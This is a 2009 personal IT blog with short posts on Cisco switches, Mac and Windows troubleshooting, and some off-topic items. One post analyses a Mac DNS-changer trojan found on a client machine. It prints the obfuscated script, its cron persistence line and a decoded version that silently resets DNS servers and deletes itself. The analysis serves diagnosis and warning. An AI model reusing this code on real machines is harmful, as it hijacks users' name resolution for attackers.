Friday, November 20, 2009

Cisco Catalyst Express 500 series switches review

I've been doing a new install with an nice new XServe and two of the CE 520G switches.

They've been a bit of a pain to be honest but once you know how to do things they're bargain.

First thing is change the smartport roles on every port. They default to server for some reason. So change them to desktop for desktops and other (blank) for anything like small switches, wireless APs etc. otherwise the port security will kick in and random stuff happens...

Server teaming is my biggest gripe. You need to set the ports to the server as switch ports (otherwise you can't set up the EtherChannel) and then setup the bond or team on the server but (big but) you also need to tag your VLAN 1 traffic. Given everything else in the universe has VLAN 1 as the native VLAN and is untagged this seems crazy.

I'm not a big fan of guis for things like switches, I like to see the config on a port and be able to debug everything under the sun. So I tend to try and push people to the "Classic" Cisco gear.

Once you know these gotchas though they're good bang for your buck and have Cisco's support which is the clincher.

Monday, November 16, 2009

VMWare server problems

This was an odd one. It may be vmware, it may be Gentoo or a combination..

VMware server wasn't working. So I tried reconfiguring from scratch but go this:

emerge vmware-server --config


Configuring pkg...

* Running /opt/vmware/server/bin/vmware-config.pl
Making sure services for VMware Server are stopped.

* WARNING: vmware is already stopped
Unable to stop services for VMware Server

Execution aborted.

Well yes, it's already stopped so why error when you're trying to stop it..duh...

Simple solution after some digging through the vmware-config.pl script..

./vmware-config.pl skip-stop-start

and I could configure it up again and we were away.





Saturday, November 14, 2009

Office Mac 2008 service pack 1 install (SP1)

Microsoft are out to frustrate me again.

I'm building a machine for a customer and while trying to install Office 2008 I keep running into this problem.

The initial install goes OK which is version 12.0. Upgrading to SP1 installs about 8 or 12 K and says it's done but none of the apps are updated. I done the remove office and that doesn't clean out the /Library/Receipts folder of the 12.1 install so I pulled those out as well and started from scratch. Still no joy SP1 refuses to install. Any one else come across this? The machine is already up to 10.5.8 to maybe that is too high for SP1.

I've sent office back and we're using OpenOffice for the moment. It's a standby machine and only gets used occasionally but it would be nice to get it sorted. Or maybe I'm missing the jab by karma to move to OpenOffice :-)

5 minutes later...

Typical you always notice something after posting. Clear out the /private/tmp folder of anything to do with the SP1 update and it works. There was Office2008_en_quit_12.1.0.combo.pkg.somehash and com.microsoft.updater/ in mine.

Tuesday, September 1, 2009

Young Girl-Old Woman Illusion

And now for something completely different...



I saw this again recently and it's always failed to click for me. I can see the young girl but never the old woman..

Then I found the trick: tip you head to the left (right in the northern hemisphere? :-) )and the old woman pops out. Ah ha finally!

This link has several versions.. http://mathworld.wolfram.com/YoungGirl-OldWomanIllusion.html

Normal service resumes..

Thursday, July 16, 2009

Entourage and proxies

Grrr.. another Microsoft making their own rules.

I have a customer with Entourage which stopped working. OWA worked through Safari (note this part...) but Entourage just showed not connected.

They have a web proxy and an exclusion for the Exchange server. But not for Entourage it seems. netstat showed connections to the proxy but it does not work via the proxy. At the same time Safari had connections directly to exchange.

Turned out Entourage checks each search domain and then adds that one before checking the bypass list. So everything else worked with the just the host name in the bypass list but you need the FQDN for Entourage to bypass the proxy..

Wednesday, May 13, 2009

Formula 1 needs viagra

sigh.. I used to love Formula 1 racing. It used to be the pinacle of motor racing.

I still remember the awesoem noise of a Ferrrari V10 doing 17000 RPM pulling out of the hairpin where we were sitting.

Now the FIA have made it a limp pathetic display. I'm not sure how much of this is due the the Max and Steve ego race but it's embarrasing to even say you used to follow F1 now.

Hopefully next year with the teams more of the direction we'll have something better. Open the budgets, let them inovate and put the technology on the cars.

Tuesday, May 12, 2009

Weird Mac Problem...

A co-worker came to me with a weird one. She said her Mac wouldn't let her delete files unless they were created today.

So we checked it out. Sure enough files and folders on the Desktop and other places we tried gave and error hfs_swapBTNodeoffset 66 and 67 out of order error -36.

The console gave a us a clue: it said on the volume sam. Curious. Further checking showed she was using FileVault and it seems to be a file mounted at login (like loop) that is an encrypted file system. So I tried turning off FileVault and got an error saying we needed another 4053GB to remove it (yes 4TB on a MacBook with a 60GB drive) so maybe there is some corruption there.

However even though it didn't turn off, this seemed to fix the problem. We'll see tomorrow if it still works but it look as if when she logs out filevault does something to the files and they can no longer be deleted.

Saturday, April 11, 2009

Gnome screensaver stopped working

This one was weird. I run my home machine on Gentoo 95% of the time and a while back the Gnome screensaver just stopped working. Usual problem; I'd made a few changes at the same time. So was it an update, a change, settings, solar flares?

After some playing and testing it was an update but one that I'd not followed the instructions on and had caused me some other problems. Python had been updated from 2.5 to 2.6 and I noticed a few things wouldn't compile and I had to re do the python modules to make them work.

Turns out there is a nice python-updater program that does the work for you. So give that a go if your screensaver just stops.

Tuesday, March 17, 2009

Cisco taking on HP...

I think it's going to be interesting in a good way. I like Cisco gear. I push it where possible.

I think the infrastructure Cisco has will be what makes it succeed. If they stick to VMs, blades or rack servers and SANs they should be fine and good competition to add to the market.

I'm a network engineer. If I get on the phone with Cisco I will have a replacement for a dead router on my doorstep usually within two hours. I hear the server guys taking two hours just getting through to the HP call centre in India then then another two hours getting their problem across and it goes downhill from there...

Friday, February 27, 2009

Go Cisco! UC500s rock..

I bought one of these a while ago to do training etc on and ran into a few problems but it was pretty good.

One particularly annoying stumbling block was I use SIP trunks and when a call got transferred to voicemail or to an auto attendant the call would go silent and drop.

There was an Early Adopter (7.1) update recently and now it all works! I've alo been playing with several other things that are not listed as features or even mentioned as supported but seem to be working.

So you have one box that does telephony (SIP, analogue or ISDN), firewalling, IPSEC and SSL VPNs (with accelerator) which comes with 4 analog extensions.

In New Zealand something like 80% or our companies have less than 20 people so these are ideal. Now that SIP things work they're even better!

Sunday, February 22, 2009

Mac RDP client to Windows 7

This may apply to other situations as well..

I was trying the Windows 7 beta and could not get the Mac to connect by RDP. I kept getting..

"You were disconnected from the Windows-based computer because of problems during the licensing protocol."

Easy fix.  Find a copy of RDP client for Mac 1.0 and try again.  You'll need to lower the security level in the remote access pane and maybe you'll need to remove the folder /User/Shared/Microsoft/RDC Crucial Server Information.

Tuesday, February 17, 2009

Absinthe and L&P!

A bit of a side track...

I have this bottle of Absinthe in the cupboard. It's been there a while. A friend said I had to try it so I did. Straight... almost spat it back out... Pretty scary stuff. Not surprising when it says 70% alcohol on the label.

Some months (or years) later, I thought it was time to try again. I got a small sieve and put sugar in it and poured the Absinthe through. It changes colour... cool. It even tastes better. OK it's not so bad..

The other night I thought that's a lot of work to go to. So I thought: could I just mix it with something? We have this softdrink (soda) here called Lemon and Paeroa (L&P) and pour this over Absinthe and it changes colour like doing the sugar ritual and it's even easier to drink.

So if you're in New Zealand or find some L&P, give it a go.. Add it to your list of things to do while visiting New Zealand :-)

Friday, February 6, 2009

Scam Websites

I found a charge on my credit card a while back

UOL THE NAMESDATABASE 866 395 4982 US
12.00 U.S.DOLLARS

Weird. Stands out given I only do transactions in US dollars every two or three months.

After some googling, it seems I am not alone with these charges.

Seems a couple of years ago I signed up to a website and paid to get in touch with an old friend. I thought it was a one off charge to give me access for a year but they keep charging you each year. Best part is try to get in touch with them to get them to stop and email is really my only option and they don't reply to those if you query why you are being charged. Others report exactly the same problem.

So these tossers just quietly pull $12 a year from thousands and thousands of people. If you're in the States another charge in US$ would just blend in. They must make a killing...

They seem to be associated with classmates.com as well so think twice before giving any details to these sites.

Saturday, January 31, 2009

Do Western Digital drives suck or is it just me? Or maybe they don't?

Typical.. as noted I created a nice new system to test Windows 7 and what happens? My 250GB Western Digital drive now thinks it's name is

WDC ROM MODEL-HAWK-----

and it is 8 GB. Not that anything can see it anymore. It still in warranty but without any proof of purchase I definitely won't get squat...

In some countries I could march back in and say it's broken and they'd bend over backwards to help me. We don't really have a customer focus in retail in New Zealand.

We have a some law named the Consumer Guarantee Act but you still feel like you're asking someone if you can beat their mother up for even thinking about returning something.

Anyway this drive is broken and there are a lot of hits when you search for the phrase above. Looks like they're not the most reliable things on the planet. So I think I'll give them a wide birth for the moment...

Update a few hours later: I turned everything off for a while (this is usually a 24/7 machine) and the drive is back. Not sure how well but seems ok so far. So give that a go if you're WD drive goes weird...

Update some 18 months later...

I've had two more western digital drive die in the last few months and they were not coming back noway nohow. So in my eyes western digital have some very severe quality issues and I will not be buying any more anytime soon.

So I have two dead drives (both blue advanced format EARS models if any one is searching for "western digital dead drives are rubbish") fortunately both are backup drives but I now have no backup and my main drive is also a western digital so it's getting replaced as soon as I can get a new drive. Need to check reliability on other drive brands...

Sunday, January 18, 2009

Windows 7

Well I had my old drive that I cloned a few months ago just lying there so I was bored one Saturday morning so I tried to install Windows 7 to have a play. I wanted to upgrade my old drive but you have to be running Windows to do the upgrade and I had experimented with that Windows installation so much it didn't boot any more. Oh well clean install. Probably better...

Well..um..I like it. I still think the PC will still be running Linux more than any other OS and the Mac I still prefer the look and feel of but Windows 7 is pretty good.

It installed easily and the only two glitches were Cisco VPN (turn on Vista level in the compatibility) and Kaspersky beta AV blue screened (kl1.sys I think it was.) I'm running my favorite Avira Antivir now. That and MalwareBytes get my vote for the best in protection. I found a rouge process on the machine a while back and they were the only two that picked it up. Anyway I digress..

The new default interface is nice. Quite Mac like but still familiar to someone who has used Windows for years. The action center consolidates things nicely to keep things under control.

My old Vampire the Masquerade: Bloodlines ran fine with no compatibility settings needed. All the Steam games ran fine. I got 60 frames on the Half Life Coast test which is quite an improvement from when it was tested with Vista. It just doesn't feel slow and busy like Vista.

It's running Chrome now. My life partner Putty just did it's thing.

I guess the true test though will be what holes the bad people find in it once it becomes widespread.

Hopefully if I can install the release one over the Beta when it's out...

This doesn't happen often but I think you've got it about right Microsoft. Please don't bloat it...

BTW one small change I had to make to get it to talk to the Mac and other Samba boxes was in the Local Security Policy (in Administrative tools) you need to change Local Policies : Security Options then the Keys that start Network security: Minimum session security for NTLM SSP based (including secure RPC) clients and server to be a bit more tolerant. Turn off the 128 bit and tuen on NTLMv2. Not as secure but I'm only using it on my LAN and it has two firewalls (not including windows) between it and the Internet.

Thursday, January 15, 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OSX is pretty secure I told him but you should have AV software to stop you passing on nasties to your windows friends and colleagues.

Eat my words I did. That afternoon a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test try a site by IP. Fine, so it's a DNS issue..

Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK lets check /etc/resolv.conf...

nameserver 85.255.114.30
nameserver 85.255.112.152
nameserver 192.168.2.5

Oh crap... two of these were not in the TCP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host 85.255.114.30
;; connection timed out; no servers could be reached
nick@host ~ $ host 85.255.112.152
Host 152.112.255.85.in-addr.arpa not found: 2(SERVFAIL)
nick@host ~ $ whois 85.255.114.30
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.255.112.0 - 85.255.127.255'

inetnum: 85.255.112.0 - 85.255.127.255
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: UKRTELE-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered


Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt
#!/bin/sh

x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"

It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...

s1=85.255.114.30;s2=85.255.112.152;

#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"

Simple but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific so not a Linux trojan gone astray. I guess he fell for one of the download this codec type trojans and got this little parasite.

So although we don't have virii in the Mac world little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the safari or firefox holes are even spoof someones bank given the recent certificate bypass expoloit..

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!

Friday, January 9, 2009

World Community Grid BOINC not uploading

This one was a bit weird. I run BOINC on one machine and all of a sudden WCG stopped uploading with things like..

[World Community Grid] Scheduler request failed: Peer certificate cannot be authenticated with known CA certificates

or another generic one about SSL error.

Turns out playing with some flags (Gentoo build controls options) I had changed curl from using OpenSSL to GnuTLS. No biggie you would have thought but it just does not work for WCG.

Recompile it using OpenSSL makes it all happy again. So if you see these errors see if your curl has openSSL listed after it when you start the boinc_client.

This is all for Linux of course :-)

Thursday, January 8, 2009

Oh yeah..Thomson routers

What were you people thinking?  Talk about counter or  un intuitive...

The best solution I found to get these things configured for  a DSL connection was to save the config to a text file and modify it and upload it.

I webbed into the Thomson router and tried to add a PPP connection.  Nope you don't permission to do that as the admin user.  WTF?

So download the config after resetting to factory and and add entries with username and password etc for the ppp  connection and upload it and it works.  So how come I can't enter the username and password in the web interface? Grrr

Don't forget to add a default route to go out the PPP interface and it's easy...

Just a weird web interface.

Bring it Cisco

Well..New Zealand is small.  I mean small small...

Cisco have new integrated service routers (88X and 86X to expand on the 87X and 85X range I guess) that do anti virus, etc etc designed for the small office SOH market by US/World standards.  That sums up about 90% of our clients.

Bring the new toys on here!  I can't wait to try new toys from Cisco that are the all in one type thing.  They supposedly block viruses, bad content, malware etc so release it first here and we'll test it.  

It would be good to have Snort integration to block bot traffic plus any other nasties. So let's hope the Cisco open source relationship can get to that stage....

So one device that plugs into the phone line and the LAN and is a firewall and does level 3 checks on content for virus, bot etc traffic.  Doing the firewall from the outside thing is easy but monitoring outbound traffic for telltale signatures or problems would be great.